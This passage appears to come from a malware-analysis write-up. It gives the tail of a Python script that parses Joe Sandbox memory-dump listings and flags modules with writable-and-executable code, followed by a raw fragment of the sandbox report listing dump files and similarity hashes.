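            region = parse_sdmp(name)
            if region:
                regions.append(region)
    return regions


def summarise(regions):
    """Group deduplicated regions by module index, sorted by address.
    Returns {module: [(addr, protect_name, type_name, writable_code), ...]}."""
    by_module = defaultdict(set)
    for r in regions:
        by_module[r.module].add(r)
    return {mod: [(r.addr, r.protect_name, r.type_name, r.writable_code)
                  for r in sorted(regs, key=lambda r: r.addr)]
            for mod, regs in by_module.items()}


# Constructed sample: the two Memory Dump Source blocks from this listing.
SAMPLE = """
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
• Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
"""

if __name__ == "__main__":
    for mod, regs in summarise(parse_listing(SAMPLE)).items():
        print(f"module index {mod}:")
        for addr, prot, typ, wx in regs:
            print(f"  {addr:#018x} {prot:<24} {typ}{'  <-- W+X code' if wx else ''}")
```

Run on the sample, the 0x7FF67AED0000 module comes out as an ordinary image (read-only header, PAGE_EXECUTE_READ code, read/write data), while every code range of the 0x7FF8A92E0000 module is PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY inside a MEM_IMAGE mapping. That is the module whose dumps carry the OpenSSL strings, so it is the one to pull for static analysis, since the in-memory code may differ from whatever was on disk.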
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                          • Opcode ID: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                                                                                                                                                                                                          • Instruction ID: 4e1f58f5d8c545570e3f13a82bfd64df253f54345614e793646c03fb702d81ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A001DBE2B1998552EF60DF39F841165A7E0E7CC7C4B449031EB5DCBB69EE2CD1418700